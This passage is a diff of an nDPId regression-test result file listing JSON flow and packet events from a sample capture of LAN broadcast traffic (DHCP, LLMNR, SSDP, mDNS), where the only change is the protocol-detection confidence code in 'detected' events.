00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":749,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":1470104393611,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1470104393611,"pkt":"\/\/\/\/\/\/\/\/4KzLceHQCABFAADKOS4AAEARunfAqAUtwKj\/\/wCKAIoAtoChEQJF98CoBS0AAACgAAAgRU5FQkVERUNFUEVQRUxFQkVKRkNDTkVGREJFRURBQUEAIEVORkpFSEZDRVBGRkZBQ0FDQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAA1TQAAPZFEQAABgAAAAAAAAACAAAAAAAAAAAAAAAGAFYAAwABAAEAAgAXAFxNQUlMU0xPVFxCUk9XU0UACQT1RQAA"} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":753,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":1470104393813,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104393813,"pkt":"\/\/\/\/\/\/\/\/PKn0WgOECABFAABOHxcAAIARlkvAqAPswKj\/\/wCJAIkAOqdiilUBEAABAAAAAAAAIEVKRkRFQkZFRUJGQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="} 
@@ -309,46 +309,46 @@ 00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":773,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1470104395657,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104395657,"pkt":"\/\/\/\/\/\/\/\/TF4M6gNlCABFAAFIAAAAABARqaYAAAAA\/\/\/\/\/wBEAEMBNLOUAQEGALkL8pMAEIAAAAAAAAAAAAAAAAAAAAAAAExeDOoDZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBPQcBTF4M6gNlNwYBAwYPLCH\/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":784,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104396888,"flow_last_seen":1470104396888,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104396888,"l3_proto":"ip6","src_ip":"fe80::4568:efbc:40b1:1346","dst_ip":"ff02::1:3","src_port":50194,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":784,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1470104396888,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":88,"pkt_l4_len":34,"thread_ts_msec":1470104396888,"pkt":"MzMAAQADSNIkYwreht1gAAAAACIRAf6AAAAAAAAARWjvvECxE0b\/AgAAAAAAAAAAAAAAAQADxBIU6wAiAfRVcwAAAAEAAAAAAAAIa2V2aW4tUEMAAP8AAQ=="} 
-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":784,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104396888,"flow_last_seen":1470104396888,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104396888,"l3_proto":"ip6","src_ip":"fe80::4568:efbc:40b1:1346","dst_ip":"ff02::1:3","src_port":50194,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":784,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104396888,"flow_last_seen":1470104396888,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104396888,"l3_proto":"ip6","src_ip":"fe80::4568:efbc:40b1:1346","dst_ip":"ff02::1:3","src_port":50194,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":785,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104396889,"flow_last_seen":1470104396889,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104396889,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"224.0.0.252","src_port":54470,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":785,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1470104396889,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104396889,"pkt":"AQBeAAD8SNIkYwreCABFAAA2fi0AAAERlLzAqAUp4AAA\/NTGFOsAItEVVXMAAAABAAAAAAAACGtldmluLVBDAAD\/AAE="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":785,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104396889,"flow_last_seen":1470104396889,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104396889,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"224.0.0.252","src_port":54470,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":785,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104396889,"flow_last_seen":1470104396889,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104396889,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"224.0.0.252","src_port":54470,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":786,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1470104396987,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":88,"pkt_l4_len":34,"thread_ts_msec":1470104396987,"pkt":"MzMAAQADSNIkYwreht1gAAAAACIRAf6AAAAAAAAARWjvvECxE0b\/AgAAAAAAAAAAAAAAAQADxBIU6wAiAfRVcwAAAAEAAAAAAAAIa2V2aW4tUEMAAP8AAQ=="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":787,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1470104396987,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104396987,"pkt":"AQBeAAD8SNIkYwreCABFAAA2fi4AAAERlLvAqAUp4AAA\/NTGFOsAItEVVXMAAAABAAAAAAAACGtldmluLVBDAAD\/AAE="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":791,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104397091,"flow_last_seen":1470104397091,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104397091,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00850{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":791,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1470104397091,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104397091,"pkt":"\/\/\/\/\/\/\/\/cPGh+Cr9CABFAAFIAzMAAIARcMHAqAUJ\/\/\/\/\/wBEAEMBND1aAQEGAPwPedgAAIAAwKgFCQAAAAAAAAAAAAAAAHDxofgq\/QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEIPQcBcPGh+Cr9DAlKb2FubmEtUEM8CE1TRlQgNS4wNw0BDwMGLC4vHyF5+Sv8\/wAAAAAAAAAAAAAA"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":791,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104397091,"flow_last_seen":1470104397091,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104397091,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"joanna-pc","fingerprint":"1,15,3,6,44,46,47,31,33,121,249,43,252","class_ident":"MSFT 5.0"}} 
+00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":791,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104397091,"flow_last_seen":1470104397091,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104397091,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"joanna-pc","fingerprint":"1,15,3,6,44,46,47,31,33,121,249,43,252","class_ident":"MSFT 5.0"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":803,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104397807,"flow_last_seen":1470104397807,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104397807,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":49701,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":803,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1470104397807,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1470104397807,"pkt":"AQBef\/\/6bEAIlAI6CABFAAClrzIAAAERVEPAqAUw7\/\/\/+sIlB2wAkY1JTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 
-00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":803,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104397807,"flow_last_seen":1470104397807,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104397807,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":49701,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":803,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104397807,"flow_last_seen":1470104397807,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104397807,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":49701,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":810,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1470104398314,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104398314,"pkt":"TF4M6gNlYMVHBbyMCABFAAAoA95AAEAGLsvAqAUQROn9hdFlAFAG4xw4xV6fSlAUEAE+LgAA8Q52cgJF"} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":812,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104398832,"flow_last_seen":1470104398832,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1470104398832,"l3_proto":"ip4","src_ip":"192.168.5.64","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":812,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1470104398832,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1470104398832,"pkt":"AQBeAAD7ZMwunDzJCABFAABEo69AAP8RMRXAqAVA4AAA+xTpFOkAMOS\/AAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="} -00680{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":812,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104398832,"flow_last_seen":1470104398832,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1470104398832,"l3_proto":"ip4","src_ip":"192.168.5.64","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} 
+00680{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":812,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104398832,"flow_last_seen":1470104398832,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1470104398832,"l3_proto":"ip4","src_ip":"192.168.5.64","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":813,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104398932,"flow_last_seen":1470104398932,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1470104398932,"l3_proto":"ip4","src_ip":"192.168.2.186","dst_ip":"255.255.255.255","src_port":32768,"dst_port":1947,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":813,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1470104398932,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1470104398932,"pkt":"\/\/\/\/\/\/\/\/AAK2Qbs6CABFAABEAABAAEARd0fAqAK6\/\/\/\/\/4AAB5sAMBr8aWNSVlNvVTlBQUJYWldKRFlXeHNBSFZ0Ukc5c2IzSlRhWFJCYldVQQ=="} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":820,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399652,"flow_last_seen":1470104399652,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1470104399652,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"224.0.0.252","src_port":59797,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":820,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1470104399652,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1470104399652,"pkt":"AQBeAAD8bEAIlAI6CABFAAA4QZsAAAER0UXAqAUw4AAA\/OmVFOsAJO3eTL0AAAABAAAAAAAACkthc3Blci1tYWMAAP8AAQ=="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":820,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399652,"flow_last_seen":1470104399652,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1470104399652,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"224.0.0.252","src_port":59797,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
+00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":820,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399652,"flow_last_seen":1470104399652,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1470104399652,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"224.0.0.252","src_port":59797,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":824,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399854,"flow_last_seen":1470104399854,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1470104399854,"l3_proto":"ip4","src_ip":"192.168.0.100","dst_ip":"255.255.255.255","src_port":50925,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00584{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":824,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1470104399854,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1470104399854,"pkt":"\/\/\/\/\/\/\/\/TF4M6gOICABFAACAAABAAEAReWHAqABk\/\/\/\/\/8btFi4AbOgXAACpHQABAAZMXgzqA4gABQAFNE1OQVQABwAPNi4zNS4xIChzdGFibGUpAAgACE1pa3JvVGlrAAoABIOWJAAACwAJTjUzOC1HMDRVAAwABlJCNDUwRwAOAAEAABAABmV0aGVyMg=="} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":825,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399958,"flow_last_seen":1470104399958,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104399958,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"224.0.0.252","src_port":65150,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":825,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1470104399958,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104399958,"pkt":"AQBeAAD8GF4PUugBCABFAAA2MRAAAAER4cnAqAU54AAA\/P5+FOsAIr4lNLsAAAABAAAAAAAACFVzaGVyLVBDAAD\/AAE="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":825,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399958,"flow_last_seen":1470104399958,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104399958,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"224.0.0.252","src_port":65150,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
+00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":825,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399958,"flow_last_seen":1470104399958,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104399958,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"224.0.0.252","src_port":65150,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":826,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399959,"flow_last_seen":1470104399959,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104399959,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":62756,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":826,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1470104399959,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":91,"pkt_l4_len":37,"thread_ts_msec":1470104399959,"pkt":"MzMAAQADuKxv2MGbht1gAAAAACURAf6AAAAAAAAA4DQHvtj5YZf\/AgAAAAAAAAAAAAAAAQAD9SQU6wAlorgrvQAAAAEAAAAAAAALY2hhcm1pbmctUEMAAP8AAQ=="} 
-00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":826,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399959,"flow_last_seen":1470104399959,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104399959,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":62756,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":826,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399959,"flow_last_seen":1470104399959,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104399959,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":62756,"dst_port":5355,"l4_proto":"udp","ndpi": 